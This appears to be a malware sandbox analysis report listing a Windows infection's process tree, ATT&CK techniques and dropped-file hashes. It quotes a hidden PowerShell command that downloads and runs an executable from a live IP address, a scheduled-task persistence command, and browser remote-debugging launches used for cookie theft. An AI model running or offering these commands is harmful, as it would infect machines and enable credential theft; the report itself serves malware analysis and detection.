- System Location Discovery: System Language Discovery
PID:2712 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn pzT8Hman5CG /tr "mshta C:\Users\Admin\AppData\Local\Temp\2qCELHNfo.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1980
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\2qCELHNfo.hta4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:2516 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'PHAHBIS4BFQXTSNMRSVJUL5Y7RXHUVCH.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1648 -
C:\Users\Admin\AppData\Local\TempPHAHBIS4BFQXTSNMRSVJUL5Y7RXHUVCH.EXE"C:\Users\Admin\AppData\Local\TempPHAHBIS4BFQXTSNMRSVJUL5Y7RXHUVCH.EXE"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5404
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1091318001\5c66c0d7c6.exe"C:\Users\Admin\AppData\Local\Temp\1091318001\5c66c0d7c6.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3124
-
-
C:\Users\Admin\AppData\Local\Temp\1091319001\d6a6205f6a.exe"C:\Users\Admin\AppData\Local\Temp\1091319001\d6a6205f6a.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5520
-
-
C:\Users\Admin\AppData\Local\Temp\1091320001\40571ba010.exe"C:\Users\Admin\AppData\Local\Temp\1091320001\40571ba010.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3000 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- System Location Discovery: System Language Discovery
PID:5156
-
-
-
C:\Users\Admin\AppData\Local\Temp\1091321001\49e58b4688.exe"C:\Users\Admin\AppData\Local\Temp\1091321001\49e58b4688.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1116
-
-
C:\Users\Admin\AppData\Local\Temp\1091322001\da79c1018d.exe"C:\Users\Admin\AppData\Local\Temp\1091322001\da79c1018d.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5920
-
-
C:\Users\Admin\AppData\Local\Temp\1091323001\ftS1RPn.exe"C:\Users\Admin\AppData\Local\Temp\1091323001\ftS1RPn.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6084
-
-
C:\Users\Admin\AppData\Local\Temp\1091324001\ebp51gY.exe"C:\Users\Admin\AppData\Local\Temp\1091324001\ebp51gY.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2996
-
-
C:\Users\Admin\AppData\Local\Temp\1091325001\DF9PCFR.exe"C:\Users\Admin\AppData\Local\Temp\1091325001\DF9PCFR.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5044 -
C:\Users\Admin\AppData\Local\Temp\1091325001\DF9PCFR.exe"C:\Users\Admin\AppData\Local\Temp\1091325001\DF9PCFR.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4676
-
-
-
C:\Users\Admin\AppData\Local\Temp\1091326001\uXivbut.exe"C:\Users\Admin\AppData\Local\Temp\1091326001\uXivbut.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:4572 -
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5544 -
C:\Users\Admin\AppData\Local\Temp\10000170101\video.exe"C:\Users\Admin\AppData\Local\Temp\10000170101\video.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:6112
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1091327001\8QQOJj9.exe"C:\Users\Admin\AppData\Local\Temp\1091327001\8QQOJj9.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5856
-
-
C:\Users\Admin\AppData\Local\Temp\1091328001\a4809023d2.exe"C:\Users\Admin\AppData\Local\Temp\1091328001\a4809023d2.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5272 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2308 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"5⤵PID:6228
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵PID:6716
-
-
-
C:\Users\Admin\AppData\Local\Temp\1091329001\0d7b7da04a.exe"C:\Users\Admin\AppData\Local\Temp\1091329001\0d7b7da04a.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:632 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5508 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"5⤵PID:5892
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵PID:7012
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵PID:6192
-
-
-
C:\Users\Admin\AppData\Local\Temp\1091330001\7tzlyz8.exe"C:\Users\Admin\AppData\Local\Temp\1091330001\7tzlyz8.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5324
-
-
C:\Users\Admin\AppData\Local\Temp\1091331001\1eaaf100c4.exe"C:\Users\Admin\AppData\Local\Temp\1091331001\1eaaf100c4.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5760 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- System Location Discovery: System Language Discovery
PID:3348
-
-
-
C:\Users\Admin\AppData\Local\Temp\1091332001\8bb3392de9.exe"C:\Users\Admin\AppData\Local\Temp\1091332001\8bb3392de9.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5868
-
-
C:\Users\Admin\AppData\Local\Temp\1091333001\e61d73ac7d.exe"C:\Users\Admin\AppData\Local\Temp\1091333001\e61d73ac7d.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3924 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- System Location Discovery: System Language Discovery
PID:6316
-
-
-
C:\Users\Admin\AppData\Local\Temp\1091334001\0d9d6a5bdb.exe"C:\Users\Admin\AppData\Local\Temp\1091334001\0d9d6a5bdb.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:3548 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5180 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffc81a0cc40,0x7ffc81a0cc4c,0x7ffc81a0cc585⤵PID:5444
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1924,i,17730167662619408770,17363577698992791527,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1916 /prefetch:25⤵PID:3932
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2152,i,17730167662619408770,17363577698992791527,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2184 /prefetch:35⤵PID:5332
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2260,i,17730167662619408770,17363577698992791527,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2488 /prefetch:85⤵PID:2700
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3188,i,17730167662619408770,17363577698992791527,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3208 /prefetch:15⤵
- Uses browser remote debugging
PID:4864
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3216,i,17730167662619408770,17363577698992791527,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3372 /prefetch:15⤵
- Uses browser remote debugging
PID:6084
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4536,i,17730167662619408770,17363577698992791527,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4488 /prefetch:15⤵
- Uses browser remote debugging
PID:3252
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4524,i,17730167662619408770,17363577698992791527,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4728 /prefetch:85⤵PID:2628
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4812,i,17730167662619408770,17363577698992791527,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4660 /prefetch:85⤵PID:5300
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4664,i,17730167662619408770,17363577698992791527,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4692 /prefetch:85⤵PID:6324
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4556,i,17730167662619408770,17363577698992791527,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4692 /prefetch:85⤵PID:6480
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:6168 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc81a146f8,0x7ffc81a14708,0x7ffc81a147185⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:6172
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,3042081530640765027,7233764028519334698,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:25⤵PID:6104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2152,3042081530640765027,7233764028519334698,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:35⤵PID:5832
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2152,3042081530640765027,7233764028519334698,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2960 /prefetch:85⤵PID:6556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2152,3042081530640765027,7233764028519334698,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:15⤵
- Uses browser remote debugging
PID:6840
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2152,3042081530640765027,7233764028519334698,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:15⤵
- Uses browser remote debugging
PID:6848
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5664
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1860
-
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1868
-
C:\ProgramData\ifgu\gwhue.exeC:\ProgramData\ifgu\gwhue.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5640
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:2920
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:6392
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Modify Authentication Process
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
5Disable or Modify Tools
5Modify Authentication Process
1Modify Registry
6Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
2Credentials In Files
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
782B
MD516d76e35baeb05bc069a12dce9da83f9
SHA1f419fd74265369666595c7ce7823ef75b40b2768
SHA256456b0f7b0be895af21c11af10a2f10ce0f02ead47bdf1de8117d4db4f7e4c3e7
SHA5124063efb47edf9f8b64ef68ad7a2845c31535f3679b6368f9cb402411c7918b82bd6355982821bfb3b7de860b5979b8b0355c15f4d18f85d894e2f2c8e95ef18e
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
1KB
MD54280e36a29fa31c01e4d8b2ba726a0d8
SHA1c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4
-
Filesize
152B
MD54255cae88563058c7eaed69088da0ab2
SHA12bcb70f6ae6ae0207a7a964422cac20c80b26394
SHA256b0cb92f0d6e6cb20ace15d6bf06015570aee24c0d06a8102200dfd3cf4118a15
SHA512cb41c1797e6d6c5a70d9045e0319ac92512deeb4d4280a1d9a607c2a4031db6027a050633b95fadce63f6f7513ba599f336182b6ce50a0cfbc44360723c461eb
-
Filesize
152B
MD5806d271b63c2bc170813afa83e15671b
SHA1b0a5d4f3e2094a99e402438f3ff4e153a7cb7453
SHA2568c36754533e755375f987fe74c3499ba8f6044af05b416dded069e37f72d405e
SHA512eb793dc197be47854473bd49ff09902e390562c182d87a670dcd7999f512fe4c090452dcb93a8bf7a4b8eb031de94f2e399dba802ca33f8764eea256eb5e805c
-
Filesize
5KB
MD5cfa1f6174ffa552e1b47d7d1c8720ec0
SHA1529361a13544787afaf7b83c07971f7f7df6ce69
SHA25612dd9b108eaf745b683ea1c79821b442ecfcf4926686492beb73547fce70e8c2
SHA5120325e6e15ffa2baf4e417806dfdd404ed525ef27d366792659d4126b0f1114894c4d6f13bba88dff6cf5a549cf70556972a09aa474abb96623f4a8686560f2f4
-
Filesize
1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
Filesize
17KB
MD5a8899e6568ed50746944fe3d39f34f30
SHA15c18ec40c5397ea75f4e6929bbe161ae0e5e4f83
SHA256e8cb5ed7f13c0dfb5df5991bc88ee4b558cb8a04cebd2f9146a0218629a63dda
SHA512b54d936076239a6b2936567e1deaff7981d7a8b98927fddb64137e593e45f527b80b900cc7c53463f2b6e3a1810117adfea4931d881782319fe68bcf6e4a4799
-
Filesize
17KB
MD5bfea1caa148dd953c9ba02f771ab9c0f
SHA1749345fe07f0a59b878bd5430b237160514f85d1
SHA256ff28dfed2e6a88661d5e9c837b8f36f9e3d80a7250a8b142f6e6cebd9d92d077
SHA512380ed1f42a995fc0fafdb2f4c9f2737ba72e2346520f9b3d0aab91d73c03aa2b8afade3e46a662d31ab5da8dbe9210c4920e1780d66bfdf028db90e08239d0c0
-
Filesize
17KB
MD5f1429445b4dafb08d3a0de9afb6aafa0
SHA17a43e1a6cec0ba4ec82eeeb6096c3a4984d4d186
SHA256608d47f6da14e7332431a02222b49e44321e090503dd9f00893117e931e289d5
SHA512cc2e0a7ea5686607025be6ddba8ffea7ae573c134469c9c5072a434fd0a4ce81206d0a82bc04602194ab899aa32f9f866a4a8bf7b31d46b5765a0e58f558b077
-
Filesize
16KB
MD5f9217453e460351acc23f4b7921e3ba2
SHA18e1a64b683765b0a35315e7e1dff39f3181be583
SHA2565f5df5c7060a60e6adee74e96c8f3a42180c6ce8cd8cf06c3ececfdcc22720ef
SHA5125c4e9c0f88ad6aff357b74f8eaa6fdb54c64c2b14a829c291d9d7baf80c12732664a5953f1b02b1bb074728fce4f8db81fbf410efc5ddd9225ef47b42c565119
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\activity-stream.discovery_stream.json.tmp
Filesize25KB
MD5d1b822044c8f3d8e47963ff227a6a3b6
SHA1d497af75e1fc396897167501085b73998eae919e
SHA256d15fe5cf1457c6b3a5c8cb931bd6d090b81cba0cc82e3cd38d5c6eeab46aef99
SHA5121b538a8fede19dc1ce11bed8482bae3121228917ed8c14493bef63b99febd9b37a3736bb0c53220b9ebb68cfc09d06091bbc70dd0238e1ec44f0fd5fc2ea81b9
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\cache2\entries\ADF5BD09EB688DAB1F35EE02E8C35329D0E4AD89
Filesize13KB
MD595e5929e4ec55d154a2f05e796cd12e2
SHA1d1826a93df1f87b3efd325f5a5027fb4babcf719
SHA2566a72db17929a03e46eaad7fbf69cb537ef2fe840aefc74894ad3cad96cbeb56a
SHA512e89fc389d20ba83302b32a148f336a4720bb9154a29aaa0edcb6ec3dd5d811a89d21ed9c2996acde6a0ef28e8a0e0138cbdd7ae0bda64da5348e9760a91d92fc
-
Filesize
1.7MB
MD5330e42c48cd3010134e0fdb65cae7f3a
SHA1cf09cb7541b3ca75430eb71a2b4a2c763ce02fc9
SHA256c92844e7d1655a58a1f94a324f890f4e5c0789f5b6964fb409b2bb09fee1b405
SHA51280eb2213ed92f42f404c167a84509e4127ede50d74d86ff4915f3873b1637f09be8d8fd4756af15bf0431736e05c9d03460d54344262b365e5ffc0dde683bcd3
-
Filesize
3.3MB
MD5a721e607ee050d736bf429f1546e3369
SHA16af66f283664d871c67c1c2b9fcf8ce42dea51fb
SHA256c79df202931f01ae5a612c0a21742f798525a986d2dec2ba082a43067957082f
SHA512cfb5d09ee1d348ecb62c58ad673ca6cba9ca477edadb42a7b10a207f906c43d369b487c39251fe205fc0edb639fbb78db5176ef244db12f08251ed71bd3cfe51
-
Filesize
1.7MB
MD5e061f4dcbdbc33ec89ca73b7e617ba45
SHA16f90fa1041946bf00256b442ea6f1cc872ec5cf9
SHA256d6db75a6d0b374773d3181419174070e855e7b754ffef8ea042ed4a5059f809d
SHA512e882242104238eb01485aca6520f85fbaa227ce58e5b8d51614d1f7714f6e1ac9d5cf5addf2d73aab283e733d3c4fb5021973d507d589bcec8f8c5f9a84c8216
-
Filesize
